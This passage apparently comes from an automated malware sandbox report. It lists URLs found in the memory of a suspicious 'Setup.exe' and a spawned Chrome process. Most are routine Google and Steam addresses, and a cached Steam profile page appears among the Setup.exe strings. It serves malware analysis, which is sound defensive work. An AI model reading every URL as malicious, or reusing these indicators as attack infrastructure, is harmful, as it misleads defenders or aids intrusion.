      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
      Source: chrome.exe, 00000002.00000003.1922929258.000065080300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922510832.0000650803084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922793205.0000650801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922659890.0000650803030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922378839.0000650802F94000.00000004.00000800.00020000.00000000.sdmp, chromecache_73.4.dr, chromecache_70.4.drString found in binary or memory: https://apis.google.com
      Source: chrome.exe, 00000002.00000002.3543923275.0000650800664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544227255.00006508006D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
      Source: chrome.exe, 00000002.00000002.3548674885.0000650800EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543297672.00006508004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
      Source: chrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
      Source: chrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icoormant.
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
      Source: chrome.exe, 00000002.00000003.1883574094.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888667895.0000650800F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1878438319.000065080048C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885769494.0000650800CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882698145.0000650800CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
      Source: chrome.exe, 00000002.00000002.3543923275.0000650800664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
      Source: chrome.exe, 00000002.00000002.3545518029.00006508009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543923275.0000650800664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545709305.0000650800A1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
      Source: chrome.exe, 00000002.00000002.3545518029.00006508009D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=ene
      Source: chrome.exe, 00000002.00000003.1882369185.0000650800338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889942244.0000650800CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888644050.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885908066.0000650800EB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882630420.0000650800CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888797154.0000650800CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882396107.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1883574094.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888667895.0000650800F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885769494.0000650800CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882698145.0000650800CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
      Source: chrome.exe, 00000002.00000003.1875892751.00007DA0006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3557125995.00007DA000798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
      Source: chrome.exe, 00000002.00000003.1875432554.00007DA000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918142918.00007DA00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
      Source: chrome.exe, 00000002.00000003.1875892751.00007DA0006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3557125995.00007DA000798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
      Source: chrome.exe, 00000002.00000003.1875432554.00007DA000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918142918.00007DA00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
      Source: chrome.exe, 00000002.00000002.3557125995.00007DA000798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
      Source: chrome.exe, 00000002.00000003.1875835089.00007DA000690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3557125995.00007DA000798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
      Source: chrome.exe, 00000002.00000003.1875432554.00007DA000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918142918.00007DA00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
      Source: chrome.exe, 00000002.00000002.3541299980.000065080000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
      Source: chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g1
      Source: chrome.exe, 00000002.00000003.1871997267.00004F38002E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1871976350.00004F38002DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
      Source: chrome.exe, 00000002.00000002.3541299980.000065080000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543989032.0000650800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544367401.0000650800734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543561059.00006508005B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1878438319.000065080048C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544227255.00006508006D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
      Source: chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
      Source: chrome.exe, 00000002.00000002.3543854065.0000650800638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/countryflags/us.gif
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830124954.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&amp;l
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=e
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en
      Source: chrome.exe, 00000002.00000002.3553888972.000065080271E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3553921309.000065080272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543083315.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2637755343.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544026587.00006508006A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1
      Source: chrome.exe, 00000002.00000002.3553888972.000065080271E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control:
      Source: chrome.exe, 00000002.00000002.3553921309.000065080272C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1a
      Source: chrome.exe, 00000002.00000002.3542598180.0000650800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3541993812.000065080018C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1
      Source: chrome.exe, 00000002.00000002.3550668799.0000650801329000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544061169.00006508006C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542598180.0000650800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1Content-Security-Policy:
      Source: chrome.exe, 00000002.00000002.3550668799.0000650801329000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544061169.00006508006C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542598180.0000650800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1Content-Type:
      Source: chrome.exe, 00000002.00000002.3544061169.00006508006C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542598180.0000650800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1d
      Source: chrome.exe, 00000002.00000002.3546106785.0000650800AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
